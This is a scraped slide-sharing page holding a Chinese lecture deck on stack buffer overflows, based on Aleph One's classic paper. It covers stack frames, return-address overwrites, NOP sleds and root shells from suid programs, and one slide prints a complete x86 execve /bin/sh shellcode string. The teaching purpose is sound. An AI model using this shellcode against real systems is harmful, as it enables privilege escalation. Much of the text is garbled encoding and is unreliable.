Click here to load reader
Upload
neylan
View
109
Download
1
Embed Size (px)
DESCRIPTION
Buffer Overflow 原理簡介. 參考資料 : Smashing The Stack For Fun And Profit (By Aleph One). 逢甲大學資工所 平行實驗室 鍾宜勳. Stack 的運作方式 (1/9). Stack 的運作方式 (2/9). Stack 的運作方式 (3/9). Stack 的運作方式 (4/9). Stack 的運作方式 (5/9). Stack 的運作方式 (6/9). Stack 的運作方式 (7/9). Stack 的運作方式 (8/9). Stack 的運作方式 (9/9). - PowerPoint PPT Presentation
Citation preview
Buffer Overflow :Smashing The Stack For Fun And Profit(By Aleph One)
Stack(1/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[5];
return ;
Stack
}
C}
Function( )
Main( )
x
Stack(2/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[5];
return ;
Stack
}
C}
Function( )
Main( )
0
Stack(3/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[5];
return ;
Stack
}
C}
Function( )
Main( )
0
3
2
1
Return address
SFP
Stack(4/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
3
2
1
Return address
SFP
0
buffer1[1]
buffer1[0]
Stack(5/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
3
2
1
Return address
SFP
0
buffer1[1]
buffer1[0]
Stack(6/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
3
2
1
Return address
SFP
0
buffer1[1]
buffer1[0]
Stack(7/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
0
Stack(8/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
1
Stack(9/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
1
Stack,Array.Stack,Array.
StackVC}
3
2
1
Return address
SFP
0
buffer1[0]
buffer1[1]
ArrayV}
Array(Buffer Overflow)Return AddressSFP
StackVC}
3
2
1
Return address
SFP
0
buffer1[0]
buffer1[1]
ArrayV}
`
StackVC}
3
2
1
Return address
SFP
0
buffer1[0]
buffer1[1]
ArrayV}
LqgJ
buffer1[0]
buffer1[1]
buffer1[2]
buffer1[3]
Buffer OverflowReturn AddressReturnAddress
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[5];
return ;
?
Function( )
Idea 1. Return Address
Buffer OverflowReturn Address,,.codeStack,code.
3
2
1
Return address
SFP
0
movl $0x8,%ebx
movl $0x1,%eax
nop
Return AddressQ,H{^{`~,OStackCode.
StackVC}
int $0x80
{V
Idea 2. RootShell
Overflow,suidroot,overflow,shell,rootshell..
3
2
1
Return address
SFP
0
KKKKKK
KKKKKK
KKKKKK
int $0x80
RootPrivilegeShell
StackVC}
{V
@Rootvshell
Idea 3. Buffer OverflowIdea,Stackcode,RootShell,:Stackcode?Return Address?buffer overflow?codereturn.sh-2.04$./vulnerable $CODE
Shell Code
Return Address
Stackcodereturn address,buffer overflow.
:return address,.
Shell CodeStackcode,Shell code.:
jump
{D
r
ReturnAddress
call
jump
pop
StackV
Shell code
Shell Code(1/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
Shell code}
Shell Code(2/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
Shell code,zLcallO,Nre}JStack,oOocode`}qk.
Oo}
Shell Code(3/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
ore},^Shell Code}Y.
Shell Code(4/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
^Shell Code}Y.
Shell Code(5/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
Nre}POPX.
Shell Code(6/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
re},Xru},Nrexecve( ),IsXQnShell.
(1/3)Shell Code00H.strcpy(),.,Shell Code00H,\0,Shell Code,,Code.Shell.xor,0,high word0,code00H.: movb $0x0,0x7(%esi) xorl %eax,%eax
(2/3),Shell Code.sh-2.04$./vulnerable $CODEshellcode[] ="\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00""\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80""\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff""\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
Shell Code
Return Address
(3/3)Buffer Overflow,ReturnAddress,Shell Codenop.
jump
{D
r
ReturnAddress
call
jump
pop
StackV
Shell code
NOP
no@Ie
unidNiH\B@F
ArrayOverflow,Shell Code..
Array
SFP
ReturnAddress
Zu
Shell Code
sReturnAddress
NOP
StackV
sReturn AddressLk\gbReturn Addressm
Array,.Shell Code.StackReturn Address.
Array
SFP
ReturnAddress
StackV
RsReturn Address
NOPMShell Code
StacksReturn Address
sReturnAddress
Shell Code
Buffer Overflow,rootpassword,super user,.Cbound checking,C,.bound checking. Bound Checking,!!